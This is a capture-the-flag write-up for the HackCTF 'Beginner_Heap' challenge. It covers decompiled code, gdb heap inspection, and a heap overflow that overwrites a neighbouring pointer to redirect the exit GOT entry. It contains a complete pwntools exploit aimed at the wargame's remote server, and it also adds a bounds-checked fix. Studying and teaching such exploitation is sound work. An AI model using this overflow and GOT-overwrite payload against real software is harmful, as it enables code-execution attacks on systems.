[HackCTF / pwnable] Beginner_Heap

2019. 11. 26. 03:08 | Wargame & CTF/HackCTF

HackCTF - Beginner_Heap

Summary

  • 64bit

  • heap overflow

Analysis

main

void __fastcall __noreturn main(__int64 a1, char **a2, char **a3)
{
    void *v3; // ST10_8
    void *v4; // ST18_8
    char s; // [rsp+20h] [rbp-1010h]
    unsigned __int64 v6; // [rsp+1028h] [rbp-8h]

    v6 = __readfsqword(0x28u);
    v3 = malloc(0x10uLL);           // record 1: {id, pointer to data}
    *v3 = 1;
    *(v3 + 1) = malloc(8uLL);       // 8-byte data buffer for record 1
    v4 = malloc(0x10uLL);           // record 2, placed right after record 1's buffer
    *v4 = 2;
    *(v4 + 1) = malloc(8uLL);       // 8-byte data buffer for record 2
    fgets(&s, 4096, stdin);         // reads up to 4095 bytes...
    strcpy(*(v3 + 1), &s);          // ...copied unbounded into the 8-byte buffer
    fgets(&s, 4096, stdin);
    strcpy(*(v4 + 1), &s);          // second copy lands wherever *(v4 + 1) now points
    exit(0);                        // resolved through exit@got
}

0x400826

void __noreturn sub_400826()        // reads and prints "flag"; not reachable from main
{
    __int128 lineptr; // [rsp+0h] [rbp-20h]
    FILE *stream; // [rsp+10h] [rbp-10h]
    unsigned __int64 v2; // [rsp+18h] [rbp-8h]

    v2 = __readfsqword(0x28u);
    lineptr = 0uLL;
    stream = fopen("flag", "r");
    getline(&lineptr, &lineptr + 1, stream);
    puts(lineptr);
    fflush(stdout);
    free(lineptr);
    _exit(1);
}
[----------------------------------registers-----------------------------------]
RAX: 0x602070 --> 0x0
RBX: 0x0
RCX: 0x7ffff7dd1b20 --> 0x100000000
RDX: 0x602070 --> 0x0
RSI: 0x602080 --> 0x0
RDI: 0x0
RBP: 0x7fffffffe430 --> 0x4009c0 (push   r15)
RSP: 0x7fffffffd400 --> 0x7fffffffe518 --> 0x7fffffffe752 ("/home/cg10036/CTF/hackCTF/Beginner_Heap/beginner_heap")
RIP: 0x40092d (mov   rdx,rax)
R8 : 0x602000 --> 0x0
R9 : 0xd ('\r')
R10: 0x7ffff7dd1b78 --> 0x602080 --> 0x0
R11: 0x0
R12: 0x400730 (xor   ebp,ebp)
R13: 0x7fffffffe510 --> 0x1
R14: 0x0
R15: 0x0
EFLAGS: 0x206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
  0x40091d: mov   DWORD PTR [rax],0x2
  0x400923: mov   edi,0x8
  0x400928: call   0x4006d0 <malloc@plt>
=> 0x40092d: mov   rdx,rax
  0x400930: mov   rax,QWORD PTR [rbp-0x1018]
  0x400937: mov   QWORD PTR [rax+0x8],rdx
  0x40093b: mov   rdx,QWORD PTR [rip+0x20074e]        # 0x601090 <stdin>
  0x400942: lea   rax,[rbp-0x1010]
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffd400 --> 0x7fffffffe518 --> 0x7fffffffe752 ("/home/cg10036/CTF/hackCTF/Beginner_Heap/beginner_heap")
0008| 0x7fffffffd408 --> 0x100000000
0016| 0x7fffffffd410 --> 0x602010 --> 0x1
0024| 0x7fffffffd418 --> 0x602050 --> 0x2
0032| 0x7fffffffd420 --> 0x0
0040| 0x7fffffffd428 --> 0x0
0048| 0x7fffffffd430 --> 0x0
0056| 0x7fffffffd438 --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x000000000040092d in ?? ()
gdb-peda$ parseheap
addr               prev               size                 status             fd               bk                
0x602000           0x0                 0x20                 Used               None             None
0x602020           0x0                 0x20                 Used               None             None
0x602040           0x0                 0x20                 Used               None             None
0x602060           0x0                 0x20                 Used               None             None

Each malloc call was given a 0x20-byte chunk. *(v3 + 1) will be the chunk at 0x602020, and the location to overwrite is *(v4 + 1), at 0x602040+8.

So overwrite a total of (0x20+0x8) bytes of padding, then tamper with the exit GOT entry so that it points to 0x400826.
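The root cause is the unbounded strcpy from a 4096-byte fgets line into an 8-byte heap buffer. As an added example, not part of the original write-up, here is the same record layout with a copy routine that refuses input which does not fit the destination. The names struct record, record_new and store_bounded are my own.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Mirrors the challenge's 0x10-byte record: an id plus a pointer to a
 * separately allocated data buffer. The 'cap' field is added so the copy
 * routine knows how large that buffer actually is. */
struct record {
    long id;
    char *data;
    size_t cap;
};

struct record *record_new(long id, size_t cap)
{
    struct record *r = malloc(sizeof *r);
    if (r == NULL) return NULL;
    r->id = id;
    r->cap = cap;
    r->data = malloc(cap);
    if (r->data == NULL) { free(r); return NULL; }
    return r;
}

/* Hardened replacement for the binary's strcpy(*(v3 + 1), &s): the copy
 * is refused unless the line plus its NUL terminator fits in the 'cap'-byte
 * destination, so a long line can no longer run into the neighbouring
 * chunk's header and pointer field. Returns 0 on success, -1 if rejected. */
int store_bounded(struct record *r, const char *line)
{
    size_t n = strlen(line);
    if (n + 1 > r->cap)
        return -1;
    memcpy(r->data, line, n + 1);
    return 0;
}

int main(void)
{
    /* constructed inputs: a 7-byte line fits an 8-byte buffer, the
     * 0x28-byte run of 'A's from the write-up does not */
    struct record *a = record_new(1, 8), *b = record_new(2, 8);
    const char *big = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
    printf("short -> %d\n", store_bounded(a, "1234567"));  /* 0 */
    printf("long  -> %d\n", store_bounded(b, big));        /* -1 */
    free(a->data); free(a); free(b->data); free(b);
    return 0;
}
```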

Exploit

from pwn import *

e = ELF("./beginner_heap")
#p = process("./beginner_heap")
p = remote("ctf.j0n9hyun.xyz", 3016)

# 0x28 bytes of padding run from record 1's data buffer up to record 2's
# pointer field; the next 8 bytes replace that pointer with exit@got.
payload = b""
payload += b"A" * (0x20 + 0x8)
payload += p64(e.got["exit"])

p.sendline(payload)         # first strcpy: *(v4 + 1) now points at exit@got
p.sendline(p64(0x400826))   # second strcpy: exit@got <- address of sub_400826

p.interactive()

Flag

cg10036@cg10036-virtual-machine:~/CTF/hackCTF/Beginner_Heap$ p ex.py
[*] '/home/cg10036/CTF/hackCTF/Beginner_Heap/beginner_heap'
  Arch:     amd64-64-little
  RELRO:   Partial RELRO
  Stack:   No canary found
  NX:       NX enabled
  PIE:     No PIE (0x400000)
[+] Opening connection to ctf.j0n9hyun.xyz on port 3016: Done
[*] Switching to interactive mode
HackCTF{4r3_y0u_r34dy_w3lc0m3_70_h34p_53k41}
